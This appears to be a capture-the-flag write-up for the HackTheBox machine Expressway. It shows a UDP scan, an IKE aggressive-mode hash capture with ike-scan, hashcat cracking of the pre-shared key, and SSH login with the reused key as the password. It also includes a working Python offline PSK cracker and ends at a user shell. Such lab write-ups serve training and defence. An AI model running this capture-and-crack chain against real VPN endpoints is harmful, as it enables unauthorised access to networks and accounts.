HackTheBox: Expressway

SPOILER WARNING: This page contains potential spoilers, so consider that before continuing.

Expressway introduces the challenge of exploiting a weakly configured VPN and cracking credentials. It's a fun challenge with not a lot of steps, but good concepts, and it can be solved in an afternoon from a shell.

MACHINE INFO
┌────────────────────────────┐
│ MACHINE NAME: Expressway   │
│ IP: N/A                    │
│ DIFFICULTY: Easy           │
└────────────────────────────┘

The first thing to do is map out what exactly the machine is running, how we can connect to it, and what is likely to have a vulnerability. At first I ran into the issue of Nmap showing nothing other than OpenSSH, which was odd because that usually isn't the target on HTB. Rather than looking for vulnerabilities in SSH, I played with my Nmap flags until I found that -sU (UDP scan) showed me what I was looking for. A default Nmap scan only touches TCP, so a UDP-only service is invisible until you ask for it; the trade-off is that UDP scanning with version detection is slow, which is why this run took two minutes.

```
$ sudo nmap -sC -sV -sU expressway.htb
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-17 22:36 -0800
Nmap scan report for expressway.htb (10.129.2.172)
Host is up (0.085s latency).

PORT    STATE SERVICE VERSION
500/udp open  isakmp?
| ike-version:
|   attributes:
|     XAUTH
|_    Dead Peer Detection v1.0

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 121.02 seconds
```

What we see here is an Internet Key Exchange (IKE) server on 500/udp. The two attributes Nmap pulled out are vendor ID payloads: the server advertises XAUTH (extended user authentication) and Dead Peer Detection (DPD), a liveness mechanism IKE peers use to notice when the other side has gone away [1]. To go further we need a tool that actually speaks IKE; one option is ike-scan, which I found particularly useful in this case [2].
```
$ sudo ike-scan expressway.htb
Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.129.2.172	Main Mode Handshake returned HDR=(CKY-R=87048450f8217b08) SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) VID=09002689dfd6b712 (XAUTH) VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)

Ending ike-scan 1.9.6: 1 hosts scanned in 0.096 seconds (10.36 hosts/sec).  1 returned handshake; 0 returned notify
```

The accepted transform is weak on every axis (3DES, SHA1, and the 1024-bit MODP group), but the detail that matters for us is Auth=PSK. If the server also accepts Aggressive Mode, the responder sends its authentication hash (HASH_R) in the clear in the second message, before any encryption is negotiated, and that hash is keyed by the pre-shared key. That means we can capture it from an unauthenticated position and crack it offline. ike-scan's -P (--pskcrack) option writes the captured parameters to a file in the format psk-crack and hashcat understand.

```
$ sudo ike-scan expressway.htb --aggressive -Pexpresswayhash
Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.129.2.172	Aggressive Mode Handshake returned HDR=(CKY-R=d89a8b14b28af22c) SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) KeyExchange(128 bytes) Nonce(32 bytes) ID(Type=ID_USER_FQDN, Value=ike@expressway.htb) VID=09002689dfd6b712 (XAUTH) VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0) Hash(20 bytes)

Ending ike-scan 1.9.6: 1 hosts scanned in 0.099 seconds (10.15 hosts/sec).  1 returned handshake; 0 returned notify
$ cat expresswayhash
6018ae18889f1debeee9dd5e3d24fe835d9ac267ee7a470dd67790984e4891a55b81db1668...
```

The server accepted Aggressive Mode, so the file now holds everything needed to test candidate pre-shared keys against the 20-byte HASH_R, and the ID payload gives us an identity, ike@expressway.htb. That identity may belong to a regular user or a service account, but either way we can try to crack the PSK. hashcat mode 5400 is IKE-PSK SHA1 (5300 is the MD5 variant); recent versions detect it from the file, as here, or you can pass -m 5400 explicitly.

```
$ hashcat -a 0 expresswayhash ~/Downloads/rockyou.txt
Dictionary cache built:
* Filename..: /home/amelia/Downloads/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 0 secs

6018ae18889f1debeee9dd5e3d24fe835d9ac267ee7a470d...:freakingrockstarontheroad
```

The PSK is freakingrockstarontheroad, and together with the identity from the ID payload we have a credential pair to try.
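To make clear why the aggressive-mode capture is crackable at all, here is the computation psk-crack and hashcat perform, as an added worked example. This is not code from the original page, from ike-scan, or from hashcat; it reimplements the RFC 2409 pre-shared-key authentication algebra (SKEYID and HASH_R) and checks wordlist candidates against a record in the colon-separated hex layout ike-scan writes with -P. All protocol values in it are constructed locally, since the page's real hash is truncated; the field order is the psk-crack record layout, so adjust FIELDS if your ike-scan version writes something different.

```python
"""Offline recovery of an IKEv1 aggressive-mode pre-shared key.

Added worked example for this writeup, not code from ike-scan, psk-crack or
hashcat. It reimplements the RFC 2409 section 5.4 PSK computation those tools
test candidates against. Every protocol value is constructed locally.
"""
import hashlib
import hmac
from typing import Iterable, Optional

# Field order of an ike-scan --pskcrack record (psk-crack's layout):
# g_xr:g_xi:cky_r:cky_i:sai_b:idir_b:ni_b:nr_b:hash_r
FIELDS = ("g_xr", "g_xi", "cky_r", "cky_i", "sai_b", "idir_b", "ni_b", "nr_b", "hash_r")


def skeyid_psk(psk: bytes, ni_b: bytes, nr_b: bytes) -> bytes:
    """SKEYID for PSK authentication: prf(PSK, Ni_b | Nr_b).

    prf is HMAC with the negotiated hash, SHA1 because the responder offered
    Hash=SHA1. The HMAC key is the PSK itself, so every candidate password
    yields a different SKEYID and therefore a different HASH_R."""
    return hmac.new(psk, ni_b + nr_b, hashlib.sha1).digest()


def hash_r(psk: bytes, rec: dict) -> bytes:
    """HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b).

    In aggressive mode the responder sends this in the clear in message 2,
    before any encryption exists, which is what ike-scan captured above."""
    msg = rec["g_xr"] + rec["g_xi"] + rec["cky_r"] + rec["cky_i"] + rec["sai_b"] + rec["idir_b"]
    return hmac.new(skeyid_psk(psk, rec["ni_b"], rec["nr_b"]), msg, hashlib.sha1).digest()


def parse_psk_record(line: str) -> dict:
    """Parse one --pskcrack line into raw bytes per field."""
    parts = line.strip().split(":")
    if len(parts) != len(FIELDS):
        raise ValueError(f"expected {len(FIELDS)} fields, got {len(parts)}")
    return dict(zip(FIELDS, (bytes.fromhex(p) for p in parts)))


def crack_psk(line: str, wordlist: Iterable[str]) -> Optional[str]:
    """Return the first candidate whose computed HASH_R equals the captured one."""
    rec = parse_psk_record(line)
    for cand in wordlist:
        if hmac.compare_digest(hash_r(cand.encode(), rec), rec["hash_r"]):
            return cand
    return None


def make_record(psk: str, identity: str = "ike@expressway.htb") -> str:
    """Construct the record a responder holding `psk` would have produced.

    Sizes mirror the ike-scan output on the page (128-byte modp1024 DH publics,
    8-byte cookies, 32-byte nonces); the bytes are deterministic filler, not a
    real exchange."""
    def filler(tag: str, n: int) -> bytes:
        out = b""
        for i in range(0, n, 32):
            out += hashlib.sha256(f"{tag}:{i}".encode()).digest()
        return out[:n]

    rec = {
        "g_xr": filler("g_xr", 128),
        "g_xi": filler("g_xi", 128),
        "cky_r": filler("cky_r", 8),
        "cky_i": filler("cky_i", 8),
        "sai_b": filler("sai_b", 52),  # stand-in for the initiator's SA payload body
        # IDir_b: ID type ID_USER_FQDN (3), protocol 0, port 0, then the identity
        "idir_b": bytes([3, 0, 0, 0]) + identity.encode(),
        "ni_b": filler("ni_b", 32),
        "nr_b": filler("nr_b", 32),
    }
    rec["hash_r"] = hash_r(psk.encode(), rec)
    return ":".join(rec[f].hex() for f in FIELDS)


if __name__ == "__main__":
    captured = make_record("not-the-real-psk")  # constructed, hypothetical PSK
    print(crack_psk(captured, ["password", "123456", "not-the-real-psk", "letmein"]))
```

The point to take away is that nothing secret from the client side goes into HASH_R: the DH publics, cookies, nonces, SA body and responder ID are all sent on the wire, so the PSK is the only unknown and a wordlist attack is exactly a loop over two HMAC-SHA1 calls per candidate. Main Mode avoids this because its hash is sent only after the ISAKMP SA is encrypted; disabling Aggressive Mode, or moving off PSK authentication entirely, is the real fix.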
The IKE identity suggests a local user named ike, and reuse of a VPN pre-shared key as a system password is common enough that SSH with that username and the PSK is the obvious next thing to try. It works, and we have a shell.

```
$ ssh ike@expressway.htb
ike@expressway.htb's password:
Last login: Wed Sep 17 12:19:40 BST 2025 from 10.10.14.64 on ssh
Linux expressway.htb 6.16.7+deb14-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.16.7-1 (2025-09-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Jan 18 07:13:29 2026 from 10.10.15.66
ike@expressway:~$ cat user.txt
```

https://www.exploit-db.com/exploits/52352

References
1. https://community.cisco.com/t5/security-knowledge-base/dead-peer-detection/ta-p/3111324
2. https://www.kali.org/tools/ike-scan/